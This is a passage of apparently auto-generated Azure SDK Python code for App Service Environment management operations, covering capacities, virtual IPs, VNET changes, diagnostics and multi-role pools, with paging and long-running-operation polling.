_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.StampCapacityCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_capacities_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_capacities.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_capacities_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("StampCapacityCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_capacities.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/compute"} # type: ignore
@distributed_trace
def get_vip_info(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.AddressResponse:
"""Get IP addresses assigned to an App Service Environment.
Get IP addresses assigned to an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AddressResponse, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.AddressResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AddressResponse]
request = build_get_vip_info_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_vip_info.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AddressResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_vip_info.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/virtualip"} # type: ignore
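    # Illustrative sketch (comments only; attribute names as modeled on
    # AddressResponse):
    #
    #     addresses = client.app_service_environments.get_vip_info(
    #         "example-rg", "example-ase")
    #     print(addresses.internal_ip_address, addresses.outbound_ip_addresses)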
def _change_vnet_initial(
self,
resource_group_name: str,
name: str,
vnet_info: _models.VirtualNetworkProfile,
**kwargs: Any
) -> _models.WebAppCollection:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
_json = self._serialize.body(vnet_info, 'VirtualNetworkProfile')
request = build_change_vnet_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._change_vnet_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Both 200 and 202 carry a WebAppCollection payload.
        deserialized = self._deserialize('WebAppCollection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_change_vnet_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/changeVirtualNetwork"} # type: ignore
@distributed_trace
def begin_change_vnet(
self,
resource_group_name: str,
name: str,
vnet_info: _models.VirtualNetworkProfile,
**kwargs: Any
) -> LROPoller[ItemPaged[_models.WebAppCollection]]:
"""Move an App Service Environment to a different VNET.
Move an App Service Environment to a different VNET.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param vnet_info: Details for the new virtual network.
:type vnet_info: ~azure.mgmt.web.v2019_08_01.models.VirtualNetworkProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of either
WebAppCollection or the result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(vnet_info, 'VirtualNetworkProfile')
request = build_change_vnet_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.begin_change_vnet.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
_json = self._serialize.body(vnet_info, 'VirtualNetworkProfile')
request = build_change_vnet_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._change_vnet_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
vnet_info=vnet_info,
api_version=api_version,
content_type=content_type,
                cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return get_next(next_link)
return ItemPaged(
internal_get_next, extract_data
)
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_change_vnet.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/changeVirtualNetwork"} # type: ignore
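    # Illustrative sketch (comments only): this LRO is unusual in that
    # poller.result() yields a pager over the affected sites rather than a
    # single model.
    #
    #     poller = client.app_service_environments.begin_change_vnet(
    #         "example-rg", "example-ase", vnet_info=profile)  # VirtualNetworkProfile
    #     for site in poller.result():
    #         print(site.name)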
@distributed_trace
def list_diagnostics(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> List[_models.HostingEnvironmentDiagnostics]:
"""Get diagnostic information for an App Service Environment.
Get diagnostic information for an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of HostingEnvironmentDiagnostics, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2019_08_01.models.HostingEnvironmentDiagnostics]
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[List[_models.HostingEnvironmentDiagnostics]]
request = build_list_diagnostics_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_diagnostics.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[HostingEnvironmentDiagnostics]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_diagnostics.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics"} # type: ignore
@distributed_trace
def get_diagnostics_item(
self,
resource_group_name: str,
name: str,
diagnostics_name: str,
**kwargs: Any
) -> _models.HostingEnvironmentDiagnostics:
"""Get a diagnostics item for an App Service Environment.
Get a diagnostics item for an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param diagnostics_name: Name of the diagnostics item.
:type diagnostics_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: HostingEnvironmentDiagnostics, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.HostingEnvironmentDiagnostics
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.HostingEnvironmentDiagnostics]
request = build_get_diagnostics_item_request(
resource_group_name=resource_group_name,
name=name,
diagnostics_name=diagnostics_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_diagnostics_item.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('HostingEnvironmentDiagnostics', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_diagnostics_item.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics/{diagnosticsName}"} # type: ignore
@distributed_trace
def get_inbound_network_dependencies_endpoints(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.InboundEnvironmentEndpointCollection]:
"""Get the network endpoints of all inbound dependencies of an App Service Environment.
Get the network endpoints of all inbound dependencies of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InboundEnvironmentEndpointCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.InboundEnvironmentEndpointCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.InboundEnvironmentEndpointCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_inbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_inbound_network_dependencies_endpoints.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_get_inbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("InboundEnvironmentEndpointCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_inbound_network_dependencies_endpoints.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/inboundNetworkDependenciesEndpoints"} # type: ignore
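    # Minimal usage sketch (illustrative only; assumes a configured
    # WebSiteManagementClient named `client` and existing resources):
    #
    #     for endpoint in client.app_service_environments.get_inbound_network_dependencies_endpoints(
    #             resource_group_name="my-rg", name="my-ase"):
    #         print(endpoint)
    #
    # ItemPaged fetches follow-up pages lazily as the loop advances.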
@distributed_trace
def list_multi_role_pools(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.WorkerPoolCollection]:
"""Get all multi-role pools.
Get all multi-role pools.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WorkerPoolCollection or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WorkerPoolCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_pools.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WorkerPoolCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_pools.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools"} # type: ignore
@distributed_trace
def get_multi_role_pool(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Get properties of a multi-role pool.
Get properties of a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
request = build_get_multi_role_pool_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_multi_role_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_multi_role_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
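    # Minimal usage sketch (illustrative only; assumes a configured client):
    #
    #     pool = client.app_service_environments.get_multi_role_pool(
    #         resource_group_name="my-rg", name="my-ase")
    #
    # Unlike the paged operations above, this returns a single deserialized
    # WorkerPoolResource (or whatever a caller-supplied `cls` produces).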
def _create_or_update_multi_role_pool_initial(
self,
resource_group_name: str,
name: str,
multi_role_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(multi_role_pool_envelope, 'WorkerPoolResource')
request = build_create_or_update_multi_role_pool_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_multi_role_pool_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_multi_role_pool_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
@distributed_trace
def begin_create_or_update_multi_role_pool(
self,
resource_group_name: str,
name: str,
multi_role_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> LROPoller[_models.WorkerPoolResource]:
"""Create or update a multi-role pool.
Create or update a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param multi_role_pool_envelope: Properties of the multi-role pool.
:type multi_role_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either WorkerPoolResource or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_multi_role_pool_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
multi_role_pool_envelope=multi_role_pool_envelope,
api_version=api_version,
content_type=content_type,
            cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
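        # The initial call above passes `cls=lambda x, y, z: x` so the raw
        # PipelineResponse (not a deserialized model) is captured; the poller
        # drives the long-running operation and hands the final response to
        # `get_long_running_output` below for deserialization.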
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_multi_role_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
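    # Minimal usage sketch (illustrative only; assumes a configured client and
    # a populated WorkerPoolResource envelope):
    #
    #     poller = client.app_service_environments.begin_create_or_update_multi_role_pool(
    #         resource_group_name="my-rg", name="my-ase",
    #         multi_role_pool_envelope=envelope)
    #     pool = poller.result()  # blocks until the LRO completes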
@distributed_trace
def update_multi_role_pool(
self,
resource_group_name: str,
name: str,
multi_role_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Create or update a multi-role pool.
Create or update a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param multi_role_pool_envelope: Properties of the multi-role pool.
:type multi_role_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(multi_role_pool_envelope, 'WorkerPoolResource')
request = build_update_multi_role_pool_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update_multi_role_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_multi_role_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
@distributed_trace
def list_multi_role_pool_instance_metric_definitions(
self,
resource_group_name: str,
name: str,
instance: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a specific instance of a multi-role pool of an App Service
Environment.
Get metric definitions for a specific instance of a multi-role pool of an App Service
Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param instance: Name of the instance in the multi-role pool.
:type instance: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
